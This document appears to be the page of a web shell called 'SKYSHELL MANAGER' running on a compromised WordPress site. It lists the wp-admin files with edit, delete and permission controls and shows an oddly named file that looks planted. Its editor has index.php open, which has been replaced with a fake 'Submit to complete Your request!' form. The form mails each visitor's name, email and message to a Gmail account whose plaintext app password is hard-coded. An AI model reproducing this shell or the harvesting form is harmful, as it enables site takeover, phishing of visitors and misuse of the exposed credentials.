📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-functions.php
0.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: index.php
<!DOCTYPE html> <html> <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet" crossorigin="anonymous"> <style> body { background-color: #f5e0e5 !important; font-family: "Segoe UI", Tahoma, Geneva, Verdana, sans-serif; } .contact-form-wrapper { padding: 100px 0; } .contact-form { padding: 30px 40px; background-color: #ffffff; border-radius: 12px; max-width: 400px; } .contact-form textarea { resize: none; } .contact-form .form-input, .form-text-area { background-color: #f0f4f5; height: 50px; padding-left: 16px; } .contact-form .form-text-area { background-color: #f0f4f5; height: auto; padding-left: 16px; } .contact-form .form-control::placeholder { color: #aeb4b9; font-weight: 500; opacity: 1; } .contact-form .form-control:-ms-input-placeholder { color: #aeb4b9; font-weight: 500; } .contact-form .form-control::-ms-input-placeholder { color: #aeb4b9; font-weight: 500; } .contact-form .form-control:focus { border-color: #f33fb0; box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.07), 0 0 8px #f33fb0; } .contact-form .title { text-align: center; font-size: 24px; font-weight: 500; } .contact-form .description { color: #aeb4b9; font-size: 14px; text-align: center; } .contact-form .submit-button-wrapper { text-align: center; } .contact-form .submit-button-wrapper input { border: none; border-radius: 4px; background-color: #f23292; color: white; text-transform: uppercase; padding: 10px 60px; font-weight: 500; letter-spacing: 2px; } .contact-form .submit-button-wrapper input:hover { background-color: #d30069; } </style> <body> <div> <div class="contact-form-wrapper d-flex justify-content-center"> <form action="index.php" method="post" class="contact-form"> <h5 class="title">Submit to complete Your request!</h5> </p> <div> <input type="text" name="name" class="form-control rounded border-white mb-3 form-input" placeholder="Name"> </div> <div> <input type="email" name="email" class="form-control rounded border-white mb-3 form-input" placeholder="Email" required> </div> <div> <textarea name="message" class="form-control rounded border-white mb-3 form-text-area" rows="5" cols="30" placeholder="Reason for report" required></textarea> </div> <div class="submit-button-wrapper"> <input name="Submit" type="submit" value="Submit"><br> <?php use PHPMailer\PHPMailer\PHPMailer; use PHPMailer\PHPMailer\SMTP; use PHPMailer\PHPMailer\Exception; //require_once __DIR__ . '/vendor/phpmailer/src/Exception.php'; require_once __DIR__ . '/vendor/phpmailer/src/PHPMailer.php'; require_once __DIR__ . '/vendor/phpmailer/src/SMTP.php'; //subscribe form if (isset($_POST['Submit'])){ $name=$_REQUEST['name']; $email=$_REQUEST['email']; $message=$_REQUEST['message']; if (($email=="")||($email=="")) { echo "All fields are required, please fill the form again."; } else{ $mail = new PHPMailer(true); // Server settings //$mail->SMTPDebug = SMTP::DEBUG_SERVER; // for detailed debug output $mail->isSMTP(); $mail->Host = 'smtp.gmail.com'; $mail->SMTPAuth = true; $mail->SMTPSecure = PHPMailer::ENCRYPTION_STARTTLS; $mail->Port = 587; $mail->Username = 'elliotsykeser@gmail.com'; // YOUR gmail email $mail->Password = 'woeykbxsjbutarxf'; // YOUR gmail password // Sender and recipient settings $mail->setFrom('elliotsykeser@gmail.com', 'Report spam'); $mail->addAddress('elliotsykeser@gmail.com', 'Report spam'); //$mail->addReplyTo('elliotsykeser@gmail.com', 'Report spam'); // to set the reply to // Setting the email content $mail->IsHTML(true); $mail->Subject = "Report spam Details"; $mail->Body = "<strong>Report spam details<strong><br> Name : $name<br> Email : $email<br> Message : $message<br>"; //$mail->AltBody = "This is the plain text version of the email content"; if(!$mail->send()) { echo "Success! check sometimes later."; } else { echo "Thank you! successfully completed."; } } } ?> </div> </form> </div> </div> </body> </html>
Save